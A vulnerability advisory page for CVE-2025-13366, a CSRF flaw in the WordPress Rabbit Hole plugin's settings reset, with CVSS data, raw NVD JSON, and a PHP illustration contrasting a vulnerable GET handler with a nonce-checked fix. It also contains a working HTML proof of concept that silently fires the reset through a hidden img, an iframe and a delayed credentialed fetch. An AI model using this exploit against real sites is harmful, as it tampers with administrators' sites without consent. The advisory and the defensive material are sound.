Security Vulnerability Report
CVE-2025-13366 CVSS 4.3 MEDIUM

CVE-2025-13366

Published: 2025-12-12 04:15:42
Last Modified: 2026-04-15 00:35:42

Description

The Rabbit Hole plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the plugin's reset functionality. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The vulnerability is exacerbated by the fact that the reset operation is performed via a GET request, making exploitation trivial via image tags or hyperlinks.
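The description names two ingredients: a state-changing action reachable through a plain GET parameter, and no nonce check on it. The following PHP is an added illustration of that pattern and of the hardened form a WordPress developer would use; it is not the Rabbit Hole plugin's code and was not taken from the referenced admin.php. The function names, hook names, the option name `rabbit_hole_settings` and the page slug `rabbit-hole` are assumptions; the request shape `admin.php?page=rabbit-hole&action=reset` mirrors the URL used in this report's PoC.

```php
<?php
// Added illustration of the pattern described in the advisory. This is NOT
// the Rabbit Hole plugin's code: the function names, hook names, the option
// name 'rabbit_hole_settings' and the page slug 'rabbit-hole' are assumptions.

// --- Vulnerable shape -------------------------------------------------------
// A state-changing reset keyed off a plain GET parameter on the settings page,
// with no nonce check. Any third-party page an administrator views can make the
// browser issue this GET (for example through an <img src>), and the browser
// attaches the admin's WordPress cookies, so the reset runs.
function rh_insecure_settings_page() {
    if ( isset( $_GET['action'] ) && 'reset' === $_GET['action'] ) {
        delete_option( 'rabbit_hole_settings' ); // option name assumed
        echo '<div class="updated"><p>Settings reset.</p></div>';
    }
    // ... render the settings form ...
}

// --- Hardened shape ---------------------------------------------------------
// 1. The reset is submitted as a POST to admin-post.php, so an <img> tag or a
//    hyperlink can no longer trigger it.
// 2. The form carries a nonce bound to the 'rabbit_hole_reset' action and to the
//    current user's session; check_admin_referer() calls wp_die() when the nonce
//    is missing, expired or forged, so a cross-site request stops here.
// 3. A capability check limits the reset to users allowed to manage options.
function rh_render_reset_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="rabbit_hole_reset">
        <?php wp_nonce_field( 'rabbit_hole_reset', 'rabbit_hole_reset_nonce' ); ?>
        <button type="submit" class="button button-secondary">Reset settings</button>
    </form>
    <?php
}

function rh_handle_reset() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', 403 );
    }
    // Verifies $_REQUEST['rabbit_hole_reset_nonce'] against the
    // 'rabbit_hole_reset' action and dies on failure.
    check_admin_referer( 'rabbit_hole_reset', 'rabbit_hole_reset_nonce' );

    delete_option( 'rabbit_hole_settings' );

    // Redirect back to the settings page (slug assumed) so a browser refresh
    // does not resubmit the POST.
    wp_safe_redirect( add_query_arg( array( 'page' => 'rabbit-hole', 'reset' => '1' ), admin_url( 'admin.php' ) ) );
    exit;
}
// admin-post.php dispatches admin_post_{action} for logged-in users only; no
// admin_post_nopriv_ hook is registered, so unauthenticated requests do nothing.
add_action( 'admin_post_rabbit_hole_reset', 'rh_handle_reset' );
```

Two points worth keeping apart when reviewing a fix of this kind. Moving the action to POST removes the image-tag and hyperlink vectors the description calls out, but POST by itself is not a CSRF defense, since a hidden auto-submitted form can issue one; the nonce check is the actual control. And a nonce check does not replace the capability check: the nonce proves the request came from a form WordPress rendered for this user, while `current_user_can()` decides whether that user may perform the action at all.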

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Rabbit Hole Plugin <= 1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-13366 CSRF PoC for WordPress Rabbit Hole Plugin -->
<!-- Luring a logged-in administrator to visit this page is enough to trigger the vulnerability -->
<html>
<body>
<h1>Rabbit Hole Plugin CSRF Exploit</h1>
<p>Click the link below or wait for automatic triggering (some browsers load the image automatically)</p>

<!-- Method 1: use an img tag to trigger the GET request automatically -->
<img src="http://target-wordpress-site.com/wp-admin/admin.php?page=rabbit-hole&action=reset" width="0" height="0" style="display:none;" />

<!-- Method 2: use a hidden iframe -->
<iframe src="http://target-wordpress-site.com/wp-admin/admin.php?page=rabbit-hole&action=reset" style="display:none;"></iframe>

<!-- Method 3: use JavaScript to fire the request automatically -->
<script>
// Delay execution to make it less conspicuous
setTimeout(function() {
    // Build the reset request URL
    var targetUrl = 'http://target-wordpress-site.com/wp-admin/admin.php?page=rabbit-hole&action=reset';
    // Send the request with fetch (requires the administrator to be logged in with a valid session)
    fetch(targetUrl, {
        method: 'GET',
        credentials: 'include'
    }).then(function(response) {
        console.log('Reset request sent');
    }).catch(function(error) {
        console.log('Request failed:', error);
    });
}, 2000); // runs automatically after 2 seconds
</script>

<p><strong>Note:</strong> This PoC is for security research and authorized testing only; using this code to carry out attacks without authorization is illegal.</p>
</body>
</html>

References

https://plugins.trac.wordpress.org/browser/rabbit-hole/tags/1.1/functions/admin.php#L7
https://plugins.trac.wordpress.org/browser/rabbit-hole/trunk/functions/admin.php#L7
https://www.wordfence.com/threat-intel/vulnerabilities/id/eab5de7e-ddab-4c6f-af87-acce7b5ff15b?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13366",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-12T04:15:41.663",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Rabbit Hole plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the plugin's reset functionality. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The vulnerability is exacerbated by the fact that the reset operation is performed via a GET request, making exploitation trivial via image tags or hyperlinks."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-352"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/rabbit-hole/tags/1.1/functions/admin.php#L7",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/rabbit-hole/trunk/functions/admin.php#L7",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/eab5de7e-ddab-4c6f-af87-acce7b5ff15b?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}